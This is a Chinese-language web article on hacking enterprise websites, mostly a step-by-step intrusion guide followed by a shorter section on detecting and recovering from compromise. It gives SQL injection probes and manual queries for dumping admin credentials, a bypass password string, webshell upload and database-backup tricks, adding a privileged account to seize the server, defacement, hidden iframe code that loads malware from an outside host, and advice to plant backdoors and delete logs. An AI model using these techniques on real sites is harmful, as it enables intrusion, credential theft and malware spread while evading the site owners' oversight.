好多企业网站遭遇黑客攻击,像黑客入侵在互联网只要有数据网络,就能使用数据网络远程操作目标的笔记本电脑、网络服务器、企业网站,从而任意地读取或篡改目标的重要数据,又或者使用目标系统软件上的功能模块,比如对手机的麦克风开展监听,开启对方摄像头开展监控,使用已经被入侵的设备计算能力开展挖矿从而得到虚拟货币,使用目标设备的网络带宽能力发动CC并发攻击方式其他人等等!
一、 网站入侵的常规思路方法
1、经典SQL注入
通常,判断一个网站是否存在注入点,可以用',and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断,如果and 1=1正常返回页面,1=2错误,或者找不到,那么就存在注入点。
2、万能密码OR漏洞
万能密码'or'='or',可以用在后台管理输入,有的网站由于没有过滤OR漏洞,输入OR直接就可以突破,一般漏洞存在于ASP类型的网站。
3、爆库
爆库,可以理解为爆出数据库下载,用爆库之类的工具可以直接就获得管理员用户和密码,%5C为十六进制的\符号,而数据库大于5.0就可以进行爆库,如在PHP手工高级注入时,用VERSION()这个变量猜出网站数据库版本,如果一个网站数据库大于5.0,且是ACESS数据库,那么提交地址是:http://www.xxx.com/rpc/show24.asp?id=127,我们直接把%5C加到RPC后面,因为%5C是爆二级目录,所以应该是这样,http://www.xxx.com/rpc%5c/show24.asp?id=127,而%23是代表#,如果管理员为了防止他人非法下载数据库,而把数据库改成#database.mdb,这样防止了,如果页面地址为http://www.xx.com/rpd/#database.mdb,是这样的,那么我们把%23加到替换#,http://www.xx.com/rpd/%23database.mdb
4、COOKIE中转,SQL防注入程序,提醒你IP已被记录
COOKIE中转,SQL防注入,如果检测一个网站时,弹出这样一个对话框,上面出现SQL防注入程序提醒的字语,那么我们可以利用COOKIE中转,注入中转来突破,方法是先搭建一个ASP环境(且网站为ASP网站),然后打开中转工具,记住一个网站的页面地址粘贴进工具里,值是多少就写多少,生成,把生成的文件放到目录里,接下来,打开网页,输入http://127.0.0.1:(端口)/目录里文件,如果正常,那么输入http://127.0.0.1:端口/值(目录文件)?提交值,那么拿到工具里猜表名,列名了。
5、手工
ASP手工语句表名 and exists (select * from 表名)
列名 and (select count(列名) from 表名)>0
长度 and (select top 1 len(username) from admin)>0
内容 and (select top 1 asc(mid(username,1,1)) from admin)>100
PHP手工语句:order by(猜字段),and 1=2 union select (字段数)and 1=2 union selsect from(位置)
几个常用变量 ,USER(),VERSION()<数据库版本),database()<数据库名称>
6、抓包拿WEBSHELL
如果进入后台发现,点数据库备份的时候发现找不到,可以通过抓包来获得上传,拿到WEBSHELL,工具WOSCK抓包,一张图片,一个ASP马,自行搭建一个上传地址,UPLOAD加载,UPFILE上传,COOKIS=( )
7、数据库备份拿WEBSHELL和一句话木马入侵
通常进入后台了,发现有数据库备份,拿WEBSHELL吧,找一个添加产品的地方,传一个大马,格式为JPG图片,然后把图片地址粘贴到数据库备份那里,给起个名字,如SHELL.ASP,然后合地址访问的时候就进入webshell了,一句话木马入侵,先编辑记事本,加入一句话,改为2.jpg,然后备份,访问,发现500内部服务器错误,证明一句话成功,接下来用一句话木马客户端连接,得到路径页面,然后改下马名,输入大马内容,提交,得到WEBSHELL!
8、DB权限差异备份拿WEBSHELL
如果一个网站注入点是MYSQL数据库,且是DB权限,或者是SA权限,能够列目录,那么就好办了,找到网站的目录,目录通常在D和E盘,备份个小马,合地址访问看看成功没,直接备份大马貌似不行,成功后,再输入大马内容,拿到WEBSHELL!
9、找后台
找后台,一般默认为admin,admin/admin.asp,admin/login.asp,.admin_login.asp,manage/login.asp,login.asp,logon,user.asp,admin/index.asp,当然,这只是默认,一些大网站不可能还用admin作为后台,有的隐藏很深,可以简单用site:网站 inurl:后台来猜,或者下载源HTML文件分析找出后台,或者用各种工具来扫描了,方法很多的。
10、脚本提示
有的网站要求进入后台会出现一个脚本提示,就像VB编程里INPUTBOX "",一个对话输入框,我们输入administrator突破,admin代表以管理员身份来进入。
11、php后门和EWEBEDITOR编辑器入侵
PHP后门,如之前爆出的DISZ漏洞,在一个PHP网站后面加C.PHP,如果出现1,那么传个PHP马就拿到WEBSHELL,EWEBEDITOR编辑器入侵,是很快速的方式,设置好上传文件类型,传ASA,或者其他的格式,然后访问拿到WEBSHELL,如没有直接加语句拿到WEBSHELL。
12、上传漏洞
有的网站虽然没有注入点,但存在一个上传漏洞,那么我们如何来利用了,首先,打开上传地址看是否存在,如果有,试想传一个ASP大马是不行的,那么传一句话看看,先看能成功不,用明小子来上传,动网,动力,动感,乔客4种方式,页面地址格式要对应,如果一个网站地址弹出对话框,显示上传成功,那么证明可以拿到WEBSHELL,传马,另外有的没有任何显示,直接空的,那么可以构建两个上传,第一个传JPG的图片,第二个传ASP马(大马),记住,大马后面要有个空格才行,如果一个网站地址出现文件类型不正确,请重新上传,那么证明%90可以拿到WEBSHELL,只是格式不对,不允许,改后缀,只要是网站没有过滤的格式,如果一个网站地址显示请登陆再上传,那么证明没有拿到COOKIS,思路是在该网站注册一个用户,得到COOKIS,然后上传就成功了。
13、简单提权拿下服务器和SERV提权和pcanywhere三方提权
简单拿下服务器,也就是拿下网站IP主机,首先我们需要一个WEBSHELL,然后看看组件信息,看看路径可读可以写不,如果有一个可以,那么来到CMD命令下,首先输入可写的文件内容,执行命令加一个帐号和最高管理权限,然后输入netstat -an,得到主机连接端口,然后用3389连接进入,让其成为肉鸡(最好),这样比较隐蔽我们操作。
14、反查入侵和旁注和社会工程学
反查IP入侵,也就是入侵21,端口,首先我们入侵网站先PING WWW.XXX.COM ,出IP,然后到反查IP站点查挂了多少个域名,接下来,添加webmaster@地址,加入字典,(里面多收集可能的口令,如123,321,456),然后用流光探测密码,登陆ftp://ip,输入用户和密码,改掉信息等等,社会工程学X-WAY,来得到FTP密码,也需要收集,并不是每个都行,总之是自己的经验。
15、跨站脚本攻击
跨站(XSS),被动攻击,现在需要更多的思路和经验了
三段经典跨站代码
<script>alert("跨站开始")</script>
<script>alert("document.cookie")</script>
<script>window.open(http://www.hackgirl.net)</script>
16、特殊空格
利用TAB制作的特殊空格,然后注册时输入空格,加管理名字,随便在网站上找个斑竹,或者管理的名字,这样来注册,有时自己注册的这个也会变成管理员。
17、改主页
改主页,拿到WEBSHELL后,先找出首页文件,一般为index.asp,index.php.index.jsp,index.html,然后来到站点根目录,编辑index.asp(首页),清空,最好备份,输入自己的主页代码(黑页),保存,再访问时已经变成自己想要的结果了。
18、挂马
首先在WEBSHELL里,建立一个文本,改为1.htm,接下来在主页最下面挂
两段经典挂马代码
<html>
<iframe src="http://www.xxxx.com/2.htm" width="0" height="0" frameborder="0"></iframe>
</html>
<SCRIPT language=javascript>
window.open("http://www.xxx.com/2.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
二、 网站入侵基本流程
1、信息收集
1) Whois信息--注册人、电话、邮箱、DNS、地址
2) Googlehack--敏感目录、敏感文件、后台地址
3) 服务器IP--Nmap扫描、端口对应的服务、C段
4) 旁注--Bing查询、脚本工具
5) 如果遇到CDN--Cloudflare(绕过)、从子域入手(mail,postfix)、DNS传送域漏洞
6) 服务器、组件(指纹)--操作系统、web server(apache,nginx,iis)、脚本语言,数据库类型
2、漏洞挖掘
1) 探测Web应用指纹--如博客类:Wordpress、Emlog、Typecho、Z-blog,社区类:Discuz、PHPwind、Dedecms,StartBBS、Mybb等等,PHP脚本类型:Dedecms、Discuz!、PHPCMS、PHPwind
2) XSS、CSRF、SQLinjection、权限绕过、任意文件读取、文件包含...
3) 上传漏洞--截断、修改、解析漏洞
4) 有无验证码--进行暴力破解
3、漏洞利用
1) 思考目的性--达到什么样的效果
2) 隐藏,破坏性--根据探测到的应用指纹寻找对应的exp攻击载荷或者自己编写
3) 开始漏洞攻击,获取相应权限,根据场景不同变化思路拿到webshell
4、权限提升
1) 根据服务器类型选择不同的攻击载荷进行权限提升
2) 无法进行权限提升,结合获取的资料开始密码猜解,回溯信息收集
5、植入后门
1) 隐蔽性
2) 定期查看并更新,保持周期性
6、日志清理
1) 伪装,隐蔽,避免激警他们通常选择删除指定日志
2) 根据时间段,find相应日志文件 太多太多。
三、如何判断网站是否被黑?如何应对网站被黑?如何防止网站被黑?
1、如何判断网站是否被黑?
如果存在下列问题,则您的网站可能已经被黑客攻击:
1) 通过site命令查询站点,显示搜索引擎收录了大量非本站应有的页面。
2) 从百度搜索结果中点击站点的页面,跳转到了其他站点。
3) 站点内容在搜索结果中被提示存在风险。
4) 从搜索引擎带来的流量短时间内异常暴增。
一旦发现上述异常,建议您立即对网站进行排查。包括:
1、分析系统和服务器日志,检查自己站点的页面数量、用户访问流量等是否有异常波动,是否存在异常访问或操作日志;
2、检查网站文件是否有不正常的修改,尤其是首页等重点页面;
3、网站页面是否引用了未知站点的资源(图片、JS等),是否被放置了异常链接;
4、检查网站是否有不正常增加的文件或目录;
5、检查网站目录中是否有非管理员打包的网站源码、未知txt文件等。
2、如何应对网站被黑?
如果排查确认您的网站存在异常,此时您需要立即做出处理,包括:
1) 立即停止网站服务,避免用户继续受影响,防止继续影响其他站点(建议使用503返回码)。
2) 如果同一主机提供商同期内有多个站点被黑,您可以联系主机提供商,敦促对方做出应对。
3) 清理已发现的异常,排查出可能的被黑时间,和服务器上的文件修改时间相比对,处理掉黑客上传、修改过的文件;检查服务器中的用户管理设置,确认是否存在异常的变化;更改服务器的用户访问密码。
注:可以从访问日志中,确定可能的被黑时间。不过黑客可能也修改服务器的访问日志。
4) 做好安全工作,排查网站存在的漏洞,防止再次被黑。
3、如何防止网站被黑?
1) 为避免您的网站被黑客攻击,您需要在平时做大量的工作,例如
2) 定期检查服务器日志,检查是否有可疑的针对非前台页面的访问。
3) 经常检查网站文件是否有不正常的修改或者增加。
4) 关注操作系统,以及所使用程序的官方网站。如果有安全更新补丁出现,应立即部署,不使用官方已不再积极维护的版本,如果条件允许,建议直接更新至最新版;关注建站程序方发布的的安全设置准则。
5) 系统漏洞可能出自第三方应用程序,如果网站使用了这些应用程序,建议仔细评估其安全性。
6) 修改开源程序关键文件的默认文件名,黑客通常通过自动扫描某些特定文件是否存在的方式来判断是否使用了某套程序。
7) 修改默认管理员用户名,提高管理后台的密码强度,使用字母、数字以及特殊符号多种组合的密码,并严格控制不同级别用户的访问权限。
8) 选择有实力保障的主机服务提供商。
9) 关闭不必要的服务,以及端口。
10) 关闭或者限制不必要的上传功能。
11) 设置防火墙等安全措施。
12) 若被黑问题反复出现,建议重新安装服务器操作系统,并重新上传备份的网站文件。
总结
企业网站存在漏洞被黑客攻击的分析定义比如站点sql语句注入、XSS等好多不可以GetShell的网站攻击方式,暂且不再小范围的“漏洞扫描”考虑范畴,提议可以划归“安全漏洞”、“威协认知”等行业,再行再做讨论。这样的话,依照sql语句注入、XSS等通道,开展了GetShell实际操作的,我们主要问题还是在GetShell这一关键环节,无须在意安全漏洞通道在哪里
